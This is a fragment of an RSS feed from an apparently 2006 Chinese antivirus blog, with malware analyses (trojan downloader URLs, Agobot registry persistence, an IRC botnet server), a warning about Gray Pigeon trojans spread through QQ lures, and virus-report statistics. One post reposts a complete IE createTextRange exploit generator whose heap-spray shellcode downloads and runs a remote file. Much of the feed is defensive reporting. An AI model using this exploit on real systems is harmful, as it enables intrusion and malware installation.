/>
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L02385B00AF5463CD title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word">keyboard8.exe是个木马下载器。<BR>运行后，首先向一个网络asp脚本提交新增感染报告，提交形式如下：<BR><A href="http://www.nonameforthisdomain.com/teller2.asp?rnd">http://www.nonameforthisdomain.com/teller2.asp?rnd</A>=[随机数]<BR>然后获得一个要下载程序的列表：<BR><A href="http://www.nonameforthisdomain.com/data.asp?rnd">http://www.nonameforthisdomain.com/data.asp?rnd</A>=[随机数]&#038;antisp=1<BR>当前下载列表的内容如下：<BR><A href="http://content.dollarrevenue.com/keyboard8.exe">http://content.dollarrevenue.com/keyboard8.exe</A>，就是keyboard2.exe本身<BR><A href="http://content.dollarrevenue.com/mousepad8.exe">http://content.dollarrevenue.com/mousepad8.exe</A>，一个广告点击程序，可能弹出广告窗口<BR><A href="http://content.dollarrevenue.com/newname8.exe">http://content.dollarrevenue.com/newname8.exe</A>，木马下载器<BR></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV><SPAN id=L02386180B18CC550 title="" style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 5px; PADDING-BOTTOM: 1px; MARGIN: 6px 0px; BORDER-LEFT: #000000 1pt solid; WIDTH: 100%; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #e1ecf7"><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 540px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 540px" width=540></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 16px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 536px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 223px" width=223><br />
<COL style="WIDTH: 313px" width=313></COLGROUP><br />
<TBODY><br />
<TR id=L02386200B3C52753><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=223><SPAN><SPAN id=L02386240B5FD8996 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 213px; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; HEIGHT: 17px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">winsystems.exe</SPAN></SPAN></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=313><SPAN><SPAN id=L02386280B835EC19 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">Backdoor/Agobot.chx</SPAN></SPAN></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 17px"><br />
<TD style="BORDER-RIGHT: medium none; BORDER-TOP: medium none; BORDER-LEFT: medium none; BORDER-BOTTOM: medium none" width=540><br />
<DIV><SPAN><SPAN id=L02386300BA6E4F1C title="" style="PADDING-RIGHT: 1px; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-WEIGHT: normal; FONT-SIZE: x-small; OVERFLOW-X: hidden; PADDING-BOTTOM: 1px; MARGIN: 1px; VERTICAL-ALIGN: baseline; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; FONT-STYLE: normal; FONT-FAMILY: Arial; HEIGHT: 7px; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left; TEXT-DECORATION: none; WORD-WRAP: break-word"><br />
<DIV>1、病毒运行后，将创建下列文件：<BR>%SystemDir%\winsystems.exe, 80842字节<BR>2、在注册表中添加下列启动项：<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]<BR>&#8220;winsystems25&#8243; = winsystems.exe<BR>[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices]<BR>&#8220;winsystems25&#8243; = winsystems.exe<BR>这样，在Windows启动时，病毒就可以自动执行。<BR>3、连接IRC服务器boughtem.nowslate1703.info，接收并执行黑客命令</DIV><br />
<DIV>4、通过多种系统漏洞传播，传播过程中发送大量数据包，可造成中毒计算机运行速度下降，局域网拥堵。</DIV><br />
<DIV> </DIV><br />
<DIV>botnet:</DIV><br />
<DIV>boughtem.nowslate1703.info:22430</DIV><br />
<DIV>JOIN ##ploit,##ploit2 he he</DIV><br />
<DIV> </DIV></SPAN></SPAN></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></SPAN><br />
<DIV></DIV></TD></TR></TBODY></TABLE></SPAN></P><!--AD_Link_Data_Begin-->
<p align="center"><span style="font-size: 0.8em">本篇文章使用<a href="http://www.aigaogao.com/blogeditor/index.html" target="_blank">aigaogao</a> Blog软件发布, <a href="http://www.aigaogao.com/blogeditor/download.html" target="_blank">“我的Blog要备份”</a></span></p>
<p><!--AD_Link_Data_End--></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/04/04/811294.aspx/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>灰鸽子和网络色情钓鱼</title>
		<link>http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx#comments</comments>
		<pubDate>Sat, 01 Apr 2006 02:42:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx</guid>
		<description><![CDATA[ 前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当 :-&#124; 
]]></description>
			<content:encoded><![CDATA[<p>前些日子接到网友线报，反映有些人在QQ信息说明中打着色情交友的幌子传播病毒。当时好歹看了一下，然后就开始忙CMMI的工作，没有写到blog上。今天CMMI终于过了，突然想起这事来，补发一篇，希望能给那些用下半身思考的男性网友们提个醒，不要轻易上当 <img src='http://blog.donews.com/daishuo/wp-includes/images/smilies/icon_neutral.gif' alt=':-|' class='wp-smiley' />
<p>1、有几个QQ号的说明文字都包含下面字样&ldquo;本人诚征男人一名&hellip;&hellip;本人相册可供参考<a href="http://takephoto.ys168.com/">http://takephoto.ys168.com</a>&rdquo;。网址是一个永硕网络硬盘，上面有&ldquo;我的照片！嘻嘻.scr&rdquo;文件下载，该文件运行后，会显示一幅女孩图片，并释放出灰鸽子病毒。</p>
<p><img style="WIDTH: 569px; HEIGHT: 351px" height="351" alt="girl_gbird" src="http://static.flickr.com/55/120833496_c9c3ec9551_o.gif" width="569"/>
</p>
<p>2、有人打着网络视频的幌子传播病毒。我把网友提供的QQ号加为好友，下面是一段QQ聊天记录：</p>
<p><img style="WIDTH: 286px; HEIGHT: 655px" height="655" alt="girl_chat" src="http://static.flickr.com/48/120833497_87c0bc8ab8_o.gif" width="286"/>
<p>接收下来的所谓&ldquo;视频冲浪观看软件.rar&rdquo;实际上就是一个虚假的说明文档和一个灰鸽子2006病毒。</p>
<p><img style="WIDTH: 459px; HEIGHT: 270px" height="270" alt="recvd_gbird" src="http://static.flickr.com/53/120833498_f086e3610d_o.png" width="459"/></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/04/01/805877.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>IE createTextRange漏洞文件下载木马生成器</title>
		<link>http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx#comments</comments>
		<pubDate>Mon, 27 Mar 2006 15:14:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[2.系统漏洞]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx</guid>
		<description><![CDATA[<p>IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。</p><p>在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就<a href="http://www.baidu.com/s?ie=gb2312&#38;bs=%25u9090&#38;sr=&#38;z=&#38;cl=3&#38;f=8&#38;wd=%25u9090+createTextRange&#38;ct=0">baidu到一些</a>了，呵呵。<br/></p><p><textarea style="WIDTH: 518px; HEIGHT: 221px" rows="12" cols="57">/*
*
* Internet Explorer &#34;createTextRang]]></description>
			<content:encoded><![CDATA[<p>IE的createTextRange漏洞已经出来几天了。这个漏洞的利用代码依然会分配大量内存，总得来说，可以远程代码执行，自然是严重等级的漏洞，但利用起来代价很大，512M内存的机器上跑的话，也需要1～2分钟才会运行shellcode，所以今后它的泛滥程度会远低于WMF/HHCTRL/MHTML等漏洞。</p>
<p>在这里，转载一个利用createTextRange漏洞的文件下载木马生成器的源码，供从事系统安全的朋友们娱乐。其实，大家可能早就<a href="http://www.baidu.com/s?ie=gb2312&amp;bs=%25u9090&amp;sr=&amp;z=&amp;cl=3&amp;f=8&amp;wd=%25u9090+createTextRange&amp;ct=0">baidu到一些</a>了，呵呵。<br/></p>
<p><textarea style="WIDTH: 518px; HEIGHT: 221px" rows="12" cols="57">/*<br />
*<br />
* Internet Explorer &quot;createTextRang&quot; Download Shellcoded Exploit<br />
* Bug discovered by Computer Terrorism (UK)<br />
* http://www.computerterrorism.com/research/ct22-03-2006<br />
* Reliable exploitation by Darkeagle of Unl0ck Research Team<br />
* http://www.milw0rm.com/exploits/1606<br />
*<br />
* Affected Software: Microsoft Internet Explorer 6.x &amp; 7 Beta 2<br />
* Severity: Critical<br />
* Impact: Remote System Access<br />
* Solution Status: Unpatched<br />
*<br />
* E-Mail: atmaca@icqmail.com<br />
* Web: http://www.spyinstructors.com,http://www.atmacasoft.com<br />
* Credit to Kozan,Darkeagle,delikon,Stelian Ene<br />
*<br />
*/</p>
<p>#include &lt;windows.h&gt;<br />
#include &lt;stdio.h&gt;</p>
<p>#define BUF_LEN         0&#215;1518<br />
#define FILE_NAME       &quot;index.htm&quot;</p>
<p>char body1[] =<br />
	&quot;&lt;input type=\&quot;checkbox\&quot; id=\&quot;blah\&quot;&gt;\r\n&quot;<br />
	&quot;&lt;SCRIPT language=\&quot;javascript\&quot;&gt;\r\n\r\n&quot;<br />
	&quot;shellcode = unescape(\r\n&quot;<br />
	&quot;\t\&quot;%uCCE9%u0000%u5F00%u56E8%u0000%u8900%u50C3%u8E68%u0E4E%uE8EC\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u0060%u0000%uC931%uB966%u6E6F%u6851%u7275%u6D6C%uFF54%u50D0\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u3668%u2F1A%uE870%u0046%u0000%uC931%u5151%u378D%u8D56%u0877\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u5156%uD0FF%u6853%uFE98%u0E8A%u2DE8%u0000%u5100%uFF57%u31D0\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u49C9%u9090%u6853%uD87E%u73E2%u19E8%u0000%uFF00%u55D0%u6456\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u30A1%u0000%u8B00%u0C40%u708B%uAD1C%u688B%u8908%u5EE8%uC35D\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u5553%u5756%u6C8B%u1824%u458B%u8B3C%u0554%u0178%u8BEA%u184A\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u5A8B%u0120%uE3EB%u4935%u348B%u018B%u31EE%uFCFF%uC031%u38AC\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u74E0%uC107%u0DCF%uC701%uF2EB%u7C3B%u1424%uE175%u5A8B%u0124\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u66EB%u0C8B%u8B4B%u1C5A%uEB01%u048B%u018B%uE9E8%u0002%u0000\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%uC031%uEA89%u5E5F%u5B5D%uE8C3%uFF2F%uFFFF%u686D%u2E68%u7865\&quot; +\r\n&quot;<br />
	&quot;\t\&quot;%u0065&quot;;</p>
<p>char body2[] =<br />
        &quot;\r\n\r\nbigblock = unescape(\&quot;%u9090%u9090\&quot;);\r\n&quot;<br />
        &quot;slackspace = 20 + shellcode.length\r\n\r\n&quot;<br />
        &quot;while (bigblock.length &lt; slackspace)\r\n&quot;<br />
        &quot;\tbigblock += bigblock;\r\n\r\n&quot;<br />
        &quot;fillblock = bigblock.substring(0, slackspace);\r\n\r\n&quot;<br />
        &quot;block = bigblock.substring(0, bigblock.length-slackspace);\r\n\r\n&quot;<br />
        &quot;while(block.length + slackspace &lt; 0&#215;40000)\r\n&quot;<br />
        &quot;\tblock = block + block + fillblock;\r\n\r\n&quot;<br />
        &quot;memory = new Array();\r\n\r\n&quot;<br />
        &quot;for ( i = 0; i &lt; 2020; i++ )\r\n&quot;<br />
        &quot;\tmemory[i] = block + shellcode;\r\n\r\n&quot;<br />
        &quot;var r = document.getElementById(&#8216;blah&#8217;).createTextRange();\r\n\r\n&quot;<br />
        &quot;&lt;/script&gt;\r\n&quot;;</p>
<p>int main(int argc,char *argv[])<br />
{<br />
        if (argc &lt; 2)<br />
        {<br />
                printf(&quot;\nInternet Explorer \&quot;createTextRang\&quot; Download Shellcoded Exploit&quot;);<br />
                printf(&quot;\nUsage:\n&quot;);<br />
                printf(&quot; ie_exp &lt;WebUrl&gt;\n&quot;);</p>
<p>                return 0;<br />
        }</p>
<p>        FILE *File;<br />
        char *pszBuffer;<br />
        char *web = argv[1];<br />
        char *pu = &quot;%u&quot;;<br />
        char u_t[5];<br />
        char *utf16 = (char*)malloc(strlen(web)*5);</p>
<p>        if ( (File = fopen(FILE_NAME,&quot;w+b&quot;)) == NULL ) {<br />
                printf(&quot;\n [Err:] fopen()&quot;);<br />
                exit(1);<br />
        }</p>
<p>        pszBuffer = (char*)malloc(BUF_LEN);<br />
        memcpy(pszBuffer,body1,sizeof(body1)-1);</p>
<p>        memset(utf16,&#8217;\0&#8242;,strlen(web)*5);<br />
        for (unsigned int i=0;i&lt;strlen(web);i=i+2)<br />
        {<br />
                sprintf(u_t,&quot;%s%.2x%.2x&quot;, pu, web[i+1], web[i]);<br />
                strcat(utf16,u_t);<br />
        }</p>
<p>        strcat(pszBuffer,utf16);<br />
        strcat(pszBuffer,&quot;%u0000\&quot;);&quot;);<br />
        strcat(pszBuffer,body2);</p>
<p>        fwrite(pszBuffer, BUF_LEN, 1,File);<br />
        fclose(File);</p>
<p>        printf(&quot;\n\n&quot;  FILE_NAME  &quot; has been created in the current directory.\n&quot;);<br />
        return 1;<br />
}</p>
<p>// milw0rm.com [2006-03-23]</p>
<p>&lt;/body&gt;<br />
&lt;/html&gt;</textarea></p></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.donews.com/daishuo/archive/2006/03/27/795522.aspx/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>昨日病毒(2006.03.24)</title>
		<link>http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx</link>
		<comments>http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx#comments</comments>
		<pubDate>Sun, 26 Mar 2006 04:47:00 +0000</pubDate>
		<dc:creator>daishuo</dc:creator>
				<category><![CDATA[1.反病毒]]></category>

		<guid isPermaLink="false">http://blog.donews.com/daishuo/archive/2006/03/26/793001.aspx</guid>
		<description><![CDATA[3月23日上报次数较多的样本如下：
icntrl.exe -------- 222； 
lup.exe -------- 149； 
mssvcc.exe -------- 130； 
wuass32.exe -------- 93； 
mssm32.exe -------- 86； 
请进入全文查看它们的技术报告。]]></description>
			<content:encoded><![CDATA[<p><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 562px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 562px" width=562></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 41px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: #99ccff" width=562><br />
<DIV><STRONG><FONT face=Arial>昨日病毒</FONT></STRONG></DIV></TD></TR><br />
<TR style="MIN-HEIGHT: 31px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 295px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 146px" width=146><br />
<COL style="WIDTH: 149px" width=149></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=146><br />
<DIV><FONT face=Arial><STRONG>统计时段</STRONG></FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=149><br />
<DIV><FONT face=宋体><br />
<DIV title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline; FONT-SIZE: x-small; MARGIN: 1px 1px 2px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; BACKGROUND-COLOR: window"><SPAN id=L025D04E004BA05E6 style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; OVERFLOW: hidden; WIDTH: 100%; MARGIN-RIGHT: 22px; PADDING-TOP: 0px; WHITE-SPACE: nowrap; HEIGHT: 100%">2006-3-24</SPAN><SPAN style="MARGIN-LEFT: -21px; WIDTH: 20px; HEIGHT: 18px"></SPAN></DIV></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #000000 1pt solid; PADDING-LEFT: 1px; PADDING-BOTTOM: 1px; VERTICAL-ALIGN: middle; BORDER-LEFT: #000000 1pt solid; PADDING-TOP: 1px; BORDER-BOTTOM: #000000 1pt solid" width=562><SPAN><br />
<TABLE title="" style="TABLE-LAYOUT: fixed; FONT-SIZE: 10pt; WIDTH: 555px; BORDER-TOP-STYLE: none; FONT-FAMILY: SimSun; BORDER-RIGHT-STYLE: none; BORDER-LEFT-STYLE: none; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word; BORDER-BOTTOM-STYLE: none" border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 555px" width=555></COLGROUP><br />
<TBODY><br />
<TR><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><br />
<DIV><STRONG><FONT face=Arial>病毒样本上报数排行</FONT></STRONG></DIV><br />
<DIV><STRONG><FONT face=Arial></FONT></STRONG> </DIV><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 394px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 165px" width=165></COLGROUP><br />
<TBODY vAlign=top><br />
<TR style="MIN-HEIGHT: 22px"><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=229><br />
<DIV align=center><FONT face=Arial>样本文件名</FONT></DIV></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid" width=165><br />
<DIV align=center><FONT face=Arial>上报次数</FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR></TBODY><br />
<TBODY><br />
<TR id=L025D06A007170C89><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L025D0720097413AC title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">icntrl.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
<DIV><FONT face=宋体><SPAN><SPAN id=L025D07600BD11B0F title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">222</SPAN></SPAN></FONT></DIV></TD></TR></TBODY></TABLE></SPAN><br />
<DIV></DIV></TD></TR><br />
<TR id=L025DC0401C5D0CC4><br />
<TD style="BORDER-RIGHT: 1pt solid; BORDER-TOP: 1pt solid; VERTICAL-ALIGN: top; BORDER-LEFT: 1pt solid; BORDER-BOTTOM: 1pt solid; BACKGROUND-COLOR: #fdfadf" width=555><SPAN><br />
<TABLE style="BORDER-RIGHT: medium none; TABLE-LAYOUT: fixed; BORDER-TOP: medium none; FONT-SIZE: 10pt; BORDER-LEFT: medium none; WIDTH: 395px; BORDER-BOTTOM: medium none; FONT-FAMILY: SimSun; BORDER-COLLAPSE: collapse; WORD-WRAP: break-word" borderColor=buttontext border=1><br />
<COLGROUP><br />
<COL style="WIDTH: 229px" width=229><br />
<COL style="WIDTH: 166px" width=166></COLGROUP><br />
<TBODY vAlign=top><br />
<TR><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=229><FONT face=宋体><br />
<DIV><SPAN><SPAN id=L025DC0C01EBACD87 title="" style="BORDER-RIGHT: #dcdcdc 1pt solid; PADDING-RIGHT: 1px; BORDER-TOP: #dcdcdc 1pt solid; DISPLAY: inline-block; PADDING-LEFT: 1px; FONT-SIZE: x-small; PADDING-BOTTOM: 1px; MARGIN: 1px; OVERFLOW: hidden; BORDER-LEFT: #dcdcdc 1pt solid; WIDTH: 100%; COLOR: windowtext; PADDING-TOP: 1px; BORDER-BOTTOM: #dcdcdc 1pt solid; FONT-FAMILY: Arial; WHITE-SPACE: nowrap; TEXT-OVERFLOW: ellipsis; BACKGROUND-COLOR: transparent; TEXT-ALIGN: left">lup.exe</SPAN></SPAN></DIV></FONT></TD><br />
<TD style="BORDER-RIGHT: #000000 1pt solid; BORDER-TOP: #000000 1pt solid; BORDER-LEFT: #000000 1pt solid; BORDER-BOTTOM: #000000 1pt solid; BACKGROUND-COLOR: transparent" width=166><br />
